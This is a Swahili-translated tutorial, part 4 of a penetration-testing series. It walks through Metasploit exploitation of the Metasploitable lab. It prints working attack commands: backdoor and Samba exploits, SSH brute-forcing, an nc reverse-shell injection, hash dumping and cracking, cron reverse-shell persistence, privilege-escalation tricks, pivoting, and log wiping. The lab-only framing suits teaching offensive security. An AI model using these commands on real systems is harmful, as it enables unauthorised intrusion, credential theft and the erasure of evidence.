Toleo lililotafsiriwa: Exploitation: From Vulnerability to Shell

Njia ya Hacker: Mfululizo wa Sehemu 5

Sehemu ya 1: Utangulizi → Sehemu ya 2: Umahiri wa Flipper → Sehemu ya 3: Misingi ya Kali → Sehemu ya 4: Exploitation → Sehemu ya 5: Ukaguzi Kamili

Katika Sehemu 1-3, ulijenga toolkit yako. Unaweza kunakili beji, kuchora ramani za mitandao, kunasa handshakes, na kutambua kila huduma inayofanya kazi kwenye lengo. Sasa unaona udhaifu kila mahali. Lakini kuona udhaifu na kuutumia ni ujuzi tofauti kabisa.

Hapa ndipo mambo yanakuwa ya kweli. Leo utajifunza kutumia Metasploit Framework, chombo kile kile kinachotumiwa na wataalam wa penetration testing duniani kote. Utafaidika na udhaifu wako wa kwanza, utaimarisha persistence, utapandisha mamlaka, na utajifunza kufanya pivot kupitia mtandao.

Sehemu ya 1: Kujenga Maabara Yako ya Mashambulizi

Kabla ya kutumia udhaifu wowote, unahitaji malengo. Wataalam wa kweli wa penetration testing hutumia mazingira ya maabara yaliyotengwa yenye mashine zenye udhaifu kwa makusudi. Utafanya vivyo hivyo.

Mpangilio Muhimu wa Maabara

Utahitaji Nini

• Kali Linux VM - Mashine yako ya mashambulizi (kutoka Sehemu ya 3)
• Metasploitable 2 - Linux VM yenye udhaifu kwa makusudi (SourceForge)
• Metasploitable 3 - Windows/Linux VM yenye udhaifu (GitHub)
• DVWA - Damn Vulnerable Web Application (GitHub)
• VulnHub VMs - Mashine zenye udhaifu za mtindo wa CTF (vulnhub.com)

Mradi: Mpangilio wa Mtandao wa Maabara

Muda: Dakika 45

1. Pakua Metasploitable 2 kutoka SourceForge
2. Ingiza kwenye VirtualBox/VMware
3. Sanidi mtandao: Weka Kali na Metasploitable kwenye "Host-Only" au "Internal Network"
4. Anzisha Metasploitable (kuingia kwa chaguo-msingi: msfadmin / msfadmin)
5. Andika anwani ya IP: ifconfig
6. Kutoka Kali, thibitisha muunganisho: ping METASPLOITABLE_IP
7. Fanya uchunguzi wa awali: sudo nmap -sV -sC METASPLOITABLE_IP

Thibitisho: Unapaswa kuona bandari nyingi zilizofunguliwa. Metasploitable imebuniwa kuvunjwa.

Uchunguzi wako wa nmap wa Metasploitable unapaswa kuonyesha huduma kama FTP, SSH, Telnet, SMTP, HTTP, Samba, MySQL, PostgreSQL, na nyinginezo, nyingi zikiendesha matoleo ya zamani yenye udhaifu. Hii ni uwanja wako wa mazoezi.

Sehemu ya 2: Misingi ya Metasploit Framework

Metasploit si chombo tu. Ni mfumo mzima wa ikolojia. Una maelfu ya exploits, payloads, moduli za msaada, na zana za post-exploitation. Kuelewa muundo wake ni muhimu.

Kuanzisha Metasploit

1# Initialize the database (first time only)
2sudo msfdb init
3
4# Start Metasploit console
5msfconsole
6
7# You'll see the Metasploit banner and prompt:
8msf6 >

Muundo wa Metasploit

Metasploit inapanga kila kitu katika moduli:

• Exploits - Msimbo unaotumia udhaifu
• Payloads - Msimbo unaofanya kazi baada ya exploitation (shells, meterpreter)
• Auxiliary - Scanners, fuzzers, na zana nyingine
• Post - Moduli za post-exploitation kwa persistence, pivoting
• Encoders - Kuficha payloads ili kuepuka utambuzi

1# Search for modules
2msf6 > search type:exploit platform:linux smb
3
4# Search by CVE
5msf6 > search cve:2017-0144
6
7# Search by name
8msf6 > search vsftpd
9
10# Get info about a module
11msf6 > info exploit/unix/ftp/vsftpd_234_backdoor

Mtiririko wa Kazi wa Exploitation

Kila exploitation katika Metasploit inafuata muundo ule ule:

1. Chagua exploit - use exploit/path/to/module
2. Weka chaguo - IP ya lengo, bandari, stakabadhi
3. Chagua payload - Nini kinaendesha baada ya exploitation
4. Tekeleza - exploit au run

Sehemu ya 3: Exploit Yako ya Kwanza

Hebu tutumie moja ya backdoors maarufu zaidi katika historia: vsftpd 2.3.4 backdoor. Mwaka 2011, mtu fulani aliingiza backdoor katika msimbo wa chanzo wa vsftpd. Ukituma jina la mtumiaji linalomalizika na :), shell inafunguka kwenye bandari 6200.

Metasploitable 2 inaendesha toleo hili hasa.

1# Start Metasploit
2msfconsole
3
4# Search for the exploit
5msf6 > search vsftpd
6
7# Select the exploit
8msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
9
10# View required options
11msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
12
13# Set the target
14msf6 exploit(...) > set RHOSTS 192.168.56.101
15
16# Run the exploit
17msf6 exploit(...) > exploit
18
19# If successful:
20[*] Command shell session 1 opened
21[+] Got shell!
22
23# You now have a root shell on the target
24whoami
25root
26id
27uid=0(root) gid=0(root)

Hiyo ndiyo. Huduma moja yenye udhaifu, exploit moja, ufikiaji wa root. Ndiyo maana kusasisha programu ni muhimu.

Mradi: Kutumia vsftpd Backdoor

Muda: Dakika 15

Masharti ya awali: Metasploitable 2 inafanya kazi, Kali kwenye mtandao ule ule

1. Thibitisha FTP inafanya kazi: nmap -sV -p 21 TARGET_IP
2. Anzisha msfconsole
3. Tafuta, chagua, na sanidi exploit ya vsftpd
4. Endesha exploit
5. Ukipata shell, chunguza: cat /etc/shadow

Vigezo vya mafanikio: Unaweza kusoma /etc/shadow, ambayo root pekee anaweza kufikia.

Sehemu ya 4: Kuelewa Payloads

Payload ni kile kinachoendesha baada ya exploit kufanikiwa. Shell ya msingi tuliyopata hapo juu ni rahisi, lakini Metasploit inatoa chaguo zenye nguvu zaidi.

Aina za Payloads

• Singles - Payloads zinazojitegemea, za matumizi moja (kuongeza mtumiaji, kuendesha amri)
• Stagers - Payloads ndogo zinazoweka muunganisho, kisha kupakua payload kuu
• Stages - Payload kuu inayopakuliwa na stager (Meterpreter)

1# List compatible payloads for current exploit
2msf6 exploit(...) > show payloads
3
4# Set a specific payload
5msf6 exploit(...) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
6
7# Payload naming convention:
8# platform/arch/payload_type/connection_type
9# linux/x86/meterpreter/reverse_tcp
10# windows/x64/shell/bind_tcp

Reverse dhidi ya Bind Shells

• Reverse shell - Lengo linaunganisha kurudi kwako. Bora kwa kupita firewalls (trafiki ya kutoka kawaida inaruhusiwa).
• Bind shell - Lengo linafungua bandari ili uunganishe. Rahisi kugundua, mara nyingi inazuiwa na firewalls.

1# For reverse shells, you must set your IP
2msf6 exploit(...) > set LHOST YOUR_KALI_IP
3msf6 exploit(...) > set LPORT 4444
4
5# Metasploit starts a listener automatically when you exploit

Meterpreter: Payload Bora Zaidi

Meterpreter ni payload yenye nguvu zaidi ya Metasploit. Inafanya kazi kabisa kwenye kumbukumbu (hakuna faili kwenye diski), inatoa mawasiliano yaliyosimbwa kwa njia fiche, na inajumuisha makumi ya amri zilizojengwa ndani kwa post-exploitation.

1# Meterpreter commands (once you have a session)
2meterpreter > sysinfo          # System information
3meterpreter > getuid           # Current user
4meterpreter > pwd              # Current directory
5meterpreter > ls               # List files
6meterpreter > download file    # Download file to Kali
7meterpreter > upload file      # Upload file to target
8meterpreter > shell            # Drop to system shell
9meterpreter > hashdump         # Dump password hashes
10meterpreter > screenshot       # Take screenshot
11meterpreter > keyscan_start    # Start keylogger
12meterpreter > keyscan_dump     # Dump keystrokes
13meterpreter > background       # Background this session

Sehemu ya 5: Mbinu Zaidi za Exploitation

Kutumia Samba (SMB)

Metasploitable 2 inaendesha toleo lenye udhaifu la Samba. Hii inafanana na exploit maarufu ya EternalBlue iliyotumiwa katika WannaCry.

1# Search for Samba exploits
2msf6 > search type:exploit samba
3
4# The "username map script" vulnerability
5msf6 > use exploit/multi/samba/usermap_script
6msf6 exploit(...) > set RHOSTS TARGET_IP
7msf6 exploit(...) > set PAYLOAD cmd/unix/reverse
8msf6 exploit(...) > set LHOST YOUR_IP
9msf6 exploit(...) > exploit
10
11[*] Command shell session 2 opened

Kutumia Stakabadhi Dhaifu

Si kila uvunjaji unahitaji udhaifu wa programu. Nywila dhaifu ziko kila mahali.

1# SSH brute-force auxiliary module
2msf6 > use auxiliary/scanner/ssh/ssh_login
3msf6 auxiliary(...) > set RHOSTS TARGET_IP
4msf6 auxiliary(...) > set USERNAME root
5msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
6msf6 auxiliary(...) > set STOP_ON_SUCCESS true
7msf6 auxiliary(...) > run
8
9# For known credentials
10msf6 > use auxiliary/scanner/ssh/ssh_login
11msf6 auxiliary(...) > set USERNAME msfadmin
12msf6 auxiliary(...) > set PASSWORD msfadmin
13msf6 auxiliary(...) > run
14
15[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'

Exploitation ya Programu za Wavuti

Metasploitable inajumuisha programu kadhaa za wavuti zenye udhaifu. Hebu tutumie PHP code injection.

1# First, browse to http://TARGET/mutillidae/
2# Find the "User Lookup" page (vulnerable to SQLi and code injection)
3
4# Use Metasploit's web exploits
5msf6 > search type:exploit php
6
7# Or exploit manually with command injection:
8# In vulnerable input field:
9; cat /etc/passwd
10; nc -e /bin/bash YOUR_IP 4444

Mradi: Kutumia Huduma Tatu Tofauti

Muda: Dakika 60

Lengo: Metasploitable 2

1. Tumia vsftpd backdoor (FTP - bandari 21) na upate root shell
2. Tumia Samba usermap_script (SMB - bandari 139/445) na upate root shell
3. Vunja stakabadhi za SSH (bandari 22) kwa kutumia auxiliary/scanner/ssh/ssh_login
4. Andika kila exploitation: moduli iliyotumiwa, chaguo zilizowekwa, matokeo

Bonasi: Chunguza programu za wavuti kwenye bandari 80 na upate njia za exploitation za mkono.

Sehemu ya 6: Post-Exploitation

Kupata shell ni mwanzo tu. Majaribio halisi ya penetration yanahitaji kuonyesha nini mshambuliaji angeweza kufanya na ufikiaji huo. Hii ni post-exploitation.

Ukusanyaji wa Taarifa

1# From a Meterpreter session
2meterpreter > sysinfo
3Computer    : metasploitable
4OS          : Linux 2.6.24
5Architecture: i686
6Meterpreter : x86/linux
7
8# Network information
9meterpreter > ipconfig
10meterpreter > route
11meterpreter > arp

1# From a regular shell
2cat /etc/passwd       # All users
3cat /etc/shadow       # Password hashes (requires root)
4cat /etc/hosts        # Network mappings
5netstat -tulpn        # Open ports
6ps aux                # Running processes
7crontab -l            # Scheduled tasks

Ukusanyaji wa Stakabadhi

1# Dump password hashes
2meterpreter > hashdump
3root:$1$XtqVHIvN$0MnR7..........:0:0:root:/root:/bin/bash
4msfadmin:$1$XN10Zj2c$Rt/zzC........:1000:1000::/home/msfadmin:/bin/bash

1# Or from shell
2cat /etc/shadow
3
4# Crack hashes offline with John the Ripper
5john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
6
7# Or hashcat (faster with GPU)
8hashcat -m 500 hashes.txt /usr/share/wordlists/rockyou.txt

Kuimarisha Persistence

Persistence inamaanisha kudumisha ufikiaji hata baada ya kuanzisha upya au wakati njia yako ya awali ya exploit imesahihishwa.

1# Add a new user with sudo access
2useradd -m -s /bin/bash hacker
3echo "hacker:password123" | chpasswd
4usermod -aG sudo hacker
5
6# Add SSH key for passwordless access
7mkdir /home/hacker/.ssh
8echo "YOUR_PUBLIC_KEY" >> /home/hacker/.ssh/authorized_keys
9
10# Cron-based reverse shell (reconnects every minute)
11echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'" >> /var/spool/cron/crontabs/root
12
13# Metasploit persistence module
14meterpreter > run persistence -h
15meterpreter > run persistence -X -i 60 -p 4444 -r YOUR_IP

Persistence = Ushahidi

Kila njia ya persistence inaacha athari. Katika jaribio la kweli la penetration, unaandika unachoweza kufanya, kisha unasafisha. Kuacha backdoors kwenye mifumo ya wateja si kitaalamu na inaweza kuwa kinyume cha sheria. Katika maabara yako, jaribu kila kitu, lakini elewa matokeo yake.

Sehemu ya 7: Kupandisha Mamlaka

Mara nyingi unapata ufikiaji wa awali kama mtumiaji wa mamlaka ya chini. Kupandisha hadi root/admin kawaida inahitajika kufikia malengo ya jaribio.

Kupandisha Mamlaka kwenye Linux

1# Current user context
2id
3whoami
4
5# SUID binaries (run as owner regardless of who executes)
6find / -perm -4000 -type f 2>/dev/null
7
8# World-writable directories
9find / -writable -type d 2>/dev/null
10
11# Sudo permissions
12sudo -l
13
14# Kernel version (for kernel exploits)
15uname -a
16
17# Running processes as root
18ps aux | grep root
19
20# Cron jobs
21cat /etc/crontab
22ls -la /etc/cron.*

Skripti za Kiotomatiki za Uorodheshaji

• LinPEAS - github.com/carlospolop/PEASS-ng
• LinEnum - github.com/rebootuser/LinEnum
• linux-exploit-suggester - GitHub

1# Upload and run LinPEAS
2# From Kali, host the script:
3python3 -m http.server 8000
4
5# From target:
6wget http://YOUR_IP:8000/linpeas.sh
7chmod +x linpeas.sh
8./linpeas.sh
9
10# LinPEAS highlights potential vectors in colors:
11# RED/YELLOW = Critical findings, likely exploitable

Njia za Kawaida za Privesc kwenye Linux

1# 1. Sudo misconfiguration
2sudo -l
3# If you see: (ALL) NOPASSWD: /usr/bin/vim
4sudo vim -c '!sh'
5# Instant root shell
6
7# 2. SUID binary exploitation
8# If /usr/bin/find has SUID bit:
9find . -exec /bin/sh -p \;
10
11# 3. Writable /etc/passwd
12# Generate password hash:
13openssl passwd -1 mypassword
14# Add to /etc/passwd:
15echo 'hacker:$1$xyz$...:0:0:root:/root:/bin/bash' >> /etc/passwd
16
17# 4. Cron job exploitation
18# If a cron runs a writable script as root:
19echo 'chmod +s /bin/bash' >> /path/to/cron/script
20# Wait for cron, then:
21/bin/bash -p
22# Root shell

Kupandisha Mamlaka kwenye Windows

Ikiwa unajaribu malengo ya Windows (Metasploitable 3), mbinu ni tofauti:

1# From Meterpreter on Windows
2meterpreter > getuid
3Server username: VICTIM\lowpriv_user
4
5meterpreter > getsystem
6[+] ...got SYSTEM
7
8# If getsystem fails, try:
9meterpreter > run post/multi/recon/local_exploit_suggester
10
11# Or background and use specific exploit:
12meterpreter > background
13msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
14msf6 exploit(...) > set SESSION 1
15msf6 exploit(...) > exploit

Mradi: Kupandisha kutoka Mtumiaji hadi Root

Muda: Dakika 45

Hali: Una ufikiaji wa SSH kwa Metasploitable kama msfadmin (si root)

1. SSH kwa Metasploitable: ssh msfadmin@TARGET
2. Endesha id kuthibitisha huna root
3. Angalia ruhusa za sudo: sudo -l
4. Tafuta SUID binaries: find / -perm -4000 2>/dev/null
5. Pakia na uendeshe LinPEAS
6. Tambua njia ya privesc na uitumie

Lengo: Pata root shell kwa kutumia kitu kingine zaidi ya kutumia huduma ya mtandao.

Sehemu ya 8: Pivoting

Pivoting ni kutumia mfumo uliokuwa umevunjwa kushambulia mifumo mingine ambayo haipatikani moja kwa moja kutoka kwa mashine yako ya mashambulizi. Hivi ndivyo washambuliaji wanavyosonga kwa upande kupitia mitandao.

Hali ya Pivot

Fikiria mtandao huu:

• Kali yako: 192.168.1.100
• Mwenyeji aliyevunjwa: 192.168.1.50 (pia ameunganishwa na mtandao wa ndani 10.0.0.0/24)
• Lengo: 10.0.0.10 (linapatikana tu kutoka 192.168.1.50)

Huwezi kufikia 10.0.0.10 moja kwa moja. Lakini kupitia mwenyeji aliyevunjwa, unaweza.

Uelekezaji wa Metasploit

1# After getting a Meterpreter session on the pivot host
2meterpreter > ipconfig
3# Shows two interfaces: 192.168.1.50 and 10.0.0.50
4
5meterpreter > run autoroute -s 10.0.0.0/24
6[+] Added route to 10.0.0.0/24 via session 1
7
8meterpreter > background
9
10# Now Metasploit routes 10.0.0.0/24 traffic through session 1
11msf6 > route print
12
13# Scan the internal network
14msf6 > use auxiliary/scanner/portscan/tcp
15msf6 auxiliary(...) > set RHOSTS 10.0.0.1-254
16msf6 auxiliary(...) > set PORTS 22,80,443,445
17msf6 auxiliary(...) > run
18
19# Exploit internal targets through the pivot
20msf6 > use exploit/windows/smb/ms17_010_eternalblue
21msf6 exploit(...) > set RHOSTS 10.0.0.10
22msf6 exploit(...) > exploit

SOCKS Proxy kwa Ufikiaji Kamili

1# Set up a SOCKS proxy through Meterpreter
2msf6 > use auxiliary/server/socks_proxy
3msf6 auxiliary(...) > set SRVPORT 1080
4msf6 auxiliary(...) > run
5
6# Configure proxychains (/etc/proxychains4.conf)
7socks5 127.0.0.1 1080
8
9# Now any tool can access the internal network
10proxychains nmap -sT -Pn 10.0.0.10
11proxychains curl http://10.0.0.10
12proxychains ssh [email protected]

SSH Tunneling (Bila Metasploit)

1# Dynamic port forwarding (SOCKS proxy)
2ssh -D 1080 user@pivot_host
3
4# Local port forwarding (specific port)
5ssh -L 8080:10.0.0.10:80 user@pivot_host
6# Now localhost:8080 reaches 10.0.0.10:80
7
8# Remote port forwarding (expose your service to internal network)
9ssh -R 4444:localhost:4444 user@pivot_host
10# Internal hosts can reach your port 4444 via pivot_host:4444

Sehemu ya 9: Kuficha Nyayo

Wataalam wa penetration testing wanaandika ufikiaji wao lakini wanasafisha baadaye. Kuelewa jinsi washambuliaji wanavyoficha nyayo pia husaidia kutambua uvamizi.

1# Clear bash history
2history -c
3cat /dev/null > ~/.bash_history
4
5# Clear auth logs (requires root)
6echo "" > /var/log/auth.log
7echo "" > /var/log/wtmp
8echo "" > /var/log/btmp
9
10# Remove specific log entries
11sed -i '/YOUR_IP/d' /var/log/auth.log
12
13# Timestomp (change file timestamps)
14touch -r /etc/passwd /path/to/your/file
15
16# Meterpreter
17meterpreter > clearev          # Clear Windows event logs
18meterpreter > timestomp file -m "01/01/2020 12:00:00"

Katika Kazi Halisi: Usifanye Hivi

Wataalam wa penetration testing wanaandika ufikiaji wao na kuripoti matokeo yao. Hawayafichi. Kufuta kumbukumbu kunaharibu ushahidi ambao walinzi wanahitaji kuelewa njia ya shambulio. Fanya mazoezi ya mbinu hizi tu katika mazingira yako ya maabara yaliyotengwa.

Njia ya Hacker

Mfululizo wa sehemu 5 unaokupeleka kutoka mwenye udadisi hadi mwenye uwezo.

Sehemu ya 1: Utangulizi Sehemu ya 2: Umahiri wa Flipper Sehemu ya 3: Misingi ya Kali Sehemu ya 4: Exploitation ✓ Sehemu ya 5: Ukaguzi Kamili

Orodha ya Ukaguzi wa Sehemu ya 4

☐ Mpangilio wa Maabara: Metasploitable 2 inafanya kazi, mtandao uliotengwa umesanidiwa

☐ Metasploit: Hifadhidata imeanzishwa, urambazaji wa msingi umejulikana

☐ Exploit ya Kwanza: vsftpd backdoor imetumika, root shell imepatikana

☐ Njia Nyingi: FTP, SMB zimetumika na stakabadhi za SSH zimevunjwa

☐ Post-Exploitation: Hash za nywila zimetolewa, mfumo umeorodheshwa

☐ Kupandisha Mamlaka: Kupandisha kutoka mtumiaji hadi root bila exploit ya mtandao

☐ Pivoting: Dhana za autoroute na SOCKS proxy zimeeleweka

☐ Uandishi: Exploits zote zimeandikwa na hatua na ushahidi

Kinachofuata

Umejifunza kutumia udhaifu, kupandisha mamlaka, na kufanya pivot kupitia mitandao. Umeona jinsi udhaifu mmoja unavyokuwa uvunjaji kamili haraka. Unaelewa wataalam wa penetration testing wanafanya nini.

Katika Sehemu ya 5, tunaunganisha kila kitu pamoja. Utafanya ukaguzi kamili wa usalama kutoka mwanzo hadi mwisho:

• Upeo na sheria za ushiriki
• Mbinu kamili ya uchunguzi
• Exploitation ya utaratibu
• Post-exploitation kamili
• Kuripoti kitaalamu
• Mapendekezo ya kurekebisha

Sehemu ya 5 ni kilele. Kila kitu ulichojifunza katika mfululizo huu kinaunganika kuwa mbinu ya ulimwengu halisi unayoweza kutumia kutathmini usalama wa mtandao wowote ulioruhusiwa kujaribu.

Umejifunza mbinu. Sasa unajifunza mbinu ya utaratibu. Sehemu ya 5 inabadilisha ujuzi kuwa mtiririko kamili wa kazi wa penetration testing.

Tutaonana katika Sehemu ya 5.